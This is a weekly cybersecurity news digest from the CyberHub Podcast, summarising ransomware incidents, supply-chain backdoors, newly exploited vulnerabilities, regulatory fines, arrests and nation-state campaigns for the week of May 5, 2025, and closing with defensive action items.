Top Cybersecurity News Weekly Summary – Week of May 5th, 2025
Ransomware Waves, Regulatory Rumbles, and Nation-State Nexus — your one-stop briefing on the week’s most consequential cyber events (May 5 – May 9, 2025)
Happy Friday Security Gang,
Another whirlwind week in cybersecurity saw luxury retailers fend off nation-state-linked ransomware, critical infrastructure reel from a spike in OT attacks, and regulators levy record-setting fines that could reshape vendor liability. At the same time, law-enforcement cooperation notched rare wins against high-profile ransomware operators—even as Russia blended cyber disruption with physical sabotage across Europe.
From stealthy supply-chain backdoors in Magento extensions to a fresh zero-click exploit in Apple AirPlay, the stories below capture where defenses crumbled, where they held firm, and what every security leader should do next. Dive in to get up to speed before Monday’s inbox flood—then pass the knowledge on to keep your organization, and the wider “security gang,” one step ahead.
1. Retail & E-Commerce Under Fire
Harrods Dodges DragonForce Ransomware – DragonForce actors reportedly phished a privileged employee, then pivoted laterally looking for Ivanti gateways still vulnerable to January’s patches. The retailer’s SOC caught the movement early and shut down east-west traffic, preventing data theft or service outages. UK officials say this wave tracks closely with Chinese economic retaliation during tariff talks, echoing similar “economic coercion” playbooks used against Australia in 2020.
Magento Extension Backdoors – Threat hunters at Sensac traced the malicious code to a GitHub account that had been dormant since 2019, suggesting a long-game supply-chain strategy. Once activated, the backdoor replaced checkout pages to skim cards and dropped web shells for persistent access. The victim list spans luxury fashion to a Fortune 250 electronics giant, highlighting how one extension repo can break hundreds of storefronts in a single stroke.
2. Critical Infrastructure & Supply Chain
Food & Ag Ransomware Spike – Clop shifted from MOVEit to file-transfer protocols common in grain-trading co-ops, locking up logistics databases at harvest time—prime extortion leverage. ISAC analysts worry that only ~30 percent of incidents get reported, meaning real numbers could be far higher. The White House is pushing voluntary data-sharing, but many growers lack even basic telemetry to contribute.
South African Airways & Massimo Corp. – SAA’s segmented network kept flight-control and booking systems on separate VLANs, limiting damage to the public-facing app. Massimo, by contrast, runs a unified ERP/MES stack; when attackers encrypted one Windows domain controller it cascaded into production downtime, triggering an 8-K filing under the SEC’s new four-day breach rule. Both cases show how architecture choices dictate breach impact.
Oil & Gas Sector Alert – Investigators found dozens of pipeline-compressor PLCs reachable over the internet with default passwords during the joint FBI/CISA scan. The advisory calls for phishing-resistant MFA on VPNs and side-band OT monitoring, warning that Russia-linked actors are upgrading wiper malware to hit physical safety systems.
3. Malware & Exploits
SteelC v2 Super-Stealer – The new loader encrypts its config with RC4 seeded by a hard-coded Telegram channel name, thwarting static IOC matching. It also self-deletes after exfil, reducing forensic artifacts and forcing responders to rely on memory captures. Researchers say its subscription price on dark-web markets jumped from $200 to $1,500 overnight—a sign of brisk criminal demand.
LangFlow, MagicInfo CMS & AirPlay Bugs – Proof-of-concept code for LangFlow RCE hit GitHub hours after the CVE dropped, and honeypots saw exploitation within 24 hours. Samsung signage boxes are popular in airports and malls; many owners never patch because they treat them like “dumb TVs,” creating perfect botnet nodes. Airborne, meanwhile, is Apple’s third wireless-attack disclosure in six months, underlining how convenience features often outrun security hardening.
Linux Disk-Wiper Supply-Chain Attack – The three malicious Golang modules masqueraded as k8s helpers but fetched a Rust wiper that overwrote partitions with random bytes. The campaign echoes HermeticWiper used in Ukraine, raising fears that destructive techniques are becoming commoditized for anyone with GitHub access.
4. Legal, Regulatory & Corporate Fallout
TikTok’s €530 M GDPR Fine – Investigators found that TikTok’s Chinese employees could query EU user data via internal dashboards—contradicting public assurances of “thick-walled” segregation. The decision forces the platform to store encryption keys inside the EU or face daily penalties, much like Meta’s 2023 Schrems II case. Expect other data-hungry apps to revisit their “standard contractual clauses” playbooks fast.
Raytheon’s $8.4 M DFARS Settlement – Auditors spotted code repos holding ITAR-controlled data on servers without two-factor authentication, breaching 7012 clauses. Although the payout is small for RTX, it signals DOJ is willing to treat cyber non-compliance like defective parts under False Claims Act precedent—an expensive shift in defense-industry risk models.
NSO Group’s $168 M Judgment – Plaintiffs argued NSO “knowingly facilitated” illegal hacks by government clients; the jury agreed despite EULA clauses disclaiming misuse. Legal scholars say the verdict could embolden future suits against dual-use tool vendors, pressuring them to build kill-switches or vet end-users more rigorously.
Congress Eyes CISA Cuts – Lawmakers fear trimming ISAC grants weakens local election support just as AI-generated disinformation surges. DHS counters that reallocating funds to “core” vulnerability disclosure programs will deliver better ROI, setting up a tense appropriations fight this summer.
5. Law-Enforcement Wins & Misses
Black Kingdom & Nefilim Arrests – Rami Ahmed’s indictment leverages FBI log data from seized Exchange servers, linking Bitcoin addresses to Yemeni SIM registrations. Artem Stryzak’s extradition took just ten months—remarkably fast—thanks to Spain’s 2023 cyber-treaty amendments, suggesting the legal pipeline for ransomware crooks is tightening.
LockBit Gets Hacked – A rival crew exploited an outdated CMS plugin on LockBit’s hidden-service panel, then dumped affiliate IDs and chat logs. While no decryption keys surfaced, victim negotiators can now correlate wallet addresses to gang members, potentially aiding sanctions designations.
6. Education & Public Sector
Coweta Schools & Western NMU Offline – Coweta’s mis-routed call to DHS delayed incident-response assistance by 18 hours, illustrating the importance of knowing “who to call” before crisis hits. NMU’s month-long outage stemmed from backups that were online—and thus encrypted—forcing a ground-up rebuild of Active Directory. Both events renew debate over mandatory K-12 cyber funding.
PowerSchool Secondary Extortion – Attackers scraped district emails from stolen PowerSchool files and are sending personalized threats to superintendents, demanding payments as low as $5,000. This decentralized shakedown model mirrors 2024’s Progress MOVEit scatter-shot extortion, proving ransomware gangs will monetize every inch of a supply-chain breach.
7. Nation-State & Geopolitics
Russian Hybrid Ops in Europe – UK MI5 linked DHL parcel bombs to pro-Kremlin group Wagner 2025, citing overlaps in VPN infrastructure also used in wiper attacks on Polish railways. Officials warn that physical sabotage paired with cyber disruption can amplify psychological impact on NATO publics.
Poland Pre-Election Attacks & Ukrainian TikTok Spy – Poland’s CERT reported 40+ phishing waves spoofing election-commission domains, many signing payloads with leaked Ukrainian certs to muddy attribution. Meanwhile, the Donetsk spy case shows how low-level HUMINT can still feed artillery targeting even in a drone-saturated battlefield.
Star Blizzard Phishing Campaigns – “Click-fix” lures send a fake Teams MFA prompt; if victims comply, malware side-loads via a signed driver, bypassing EDR. Google TAG says LostKeys beacons to compromised Czech hosting firms, complicating takedowns and offering FSB deniability.
📌 Rapid-Fire Action Items
Refresh Threat Intel: Fold DragonForce, SteelC v2 TTPs and Magento backdoor indicators into your detection feeds.
Audit Extensions & Plugins: Validate all Magento (and equivalent) add-ons; yank or sandbox anything unvetted.
Harden Food-Ag & OT Segments: Verify backups, MFA and network isolation where IT meets OT.
Patch Immediately: Prioritize LangFlow 1.3.0, Samsung MagicInfo, Apple AirPlay, Cisco IOS XE, SonicWall SMA and Android May updates.
Review Data-Transfer Controls: Map EU-to-non-EU flows and enforce SCCs or alternative safeguards ahead of potential fines.
Test Incident Response Drills: Rehearse ransomware and wiper scenarios—especially for school districts and manufacturing lines.
Monitor Vendor Compliance: Use the UK NCSC Secure-by-Default principles as a scoring matrix for suppliers.
Stay cyber safe, Security Gang!
✅ Stay Connected With Us.
👉Facebook: https://www.facebook.com/CyberHubpodcast/
👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/
👉Twitter (X): https://twitter.com/cyberhubpodcast
👉Instagram: https://www.instagram.com/cyberhubpodcast
🤝 For Business Inquiries: info@cyberhubpodcast.com
=============================
🚀 About The CyberHub Podcast.
The Hub of the Infosec Community.
Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.
For Collaboration and Business inquiries, please use the contact information below:
📩 Email: info@cyberhubpodcast.com